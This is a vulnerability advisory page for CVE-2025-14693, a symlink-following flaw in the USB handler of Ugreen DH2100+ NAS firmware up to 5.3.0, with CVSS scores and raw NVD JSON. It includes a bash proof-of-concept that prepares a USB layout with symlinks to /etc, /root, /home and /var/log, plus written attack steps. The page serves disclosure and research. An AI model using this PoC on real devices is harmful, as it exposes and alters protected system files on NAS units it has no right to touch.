Security Vulnerability Report
CVE-2025-14693 CVSS 6.2 MEDIUM

CVE-2025-14693

Published: 2025-12-15 01:15:38
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in Ugreen DH2100+ up to 5.3.0. This affects an unknown function of the component USB Handler. Such manipulation leads to symlink following. The attack can be executed directly on the physical device. The exploit has been disclosed to the public and may be used. It is suggested to upgrade the affected component.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ugreen DH2100+ firmware <= 5.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-14693 PoC - Ugreen DH2100+ Symlink Following
# Description: Creates a malicious USB with symlink to sensitive directories

# Create a directory for the exploit USB content
mkdir -p usb_exploit
cd usb_exploit || exit 1

# Create symlinks pointing to sensitive system directories
echo "Creating malicious symlinks..."
ln -sf /etc etc_link
ln -sf /var/log var_log_link
ln -sf /root root_link
ln -sf /home home_link

# Create a README file to document the exploit
cat > README.txt << 'EOF'
CVE-2025-14693 Exploit README
Target: Ugreen DH2100+ NAS
Vulnerability: Symlink Following in USB Handler

This USB device contains symbolic links that point to sensitive system
directories on the target NAS device. When connected to the vulnerable
Ugreen DH2100+ device, the USB Handler component will follow these symlinks,
potentially exposing sensitive system files and configurations.

Attack Steps:
1. Connect this USB device to Ugreen DH2100+
2. Access the NAS web interface or SSH
3. Navigate to USB storage section
4. The system will follow symlinks to sensitive directories
5. Attacker can read/write to protected locations

Recommendation: Update to firmware version > 5.3.0
EOF

echo "PoC USB device content created successfully"
echo "Directory contents:"
ls -la
cd ..

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14693", "sourceIdentifier": "[email protected]", "published": "2025-12-15T01:15:37.903", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Ugreen DH2100+ up to 5.3.0. This affects an unknown function of the component USB Handler. Such manipulation leads to symlink following. The attack can be executed directly on the physical device. The exploit has been disclosed to the public and may be used. It is suggested to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 6.5, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 2.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-61"}]}], "references": [{"url": "https://vuldb.com/?ctiid.336411", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336411", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.704646", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.704657", "source": "[email protected]"}, {"url": "https://www.notion.so/2bc6cf4e528a8083bf3fc6f7a953f0a1", "source": "[email protected]"}]}}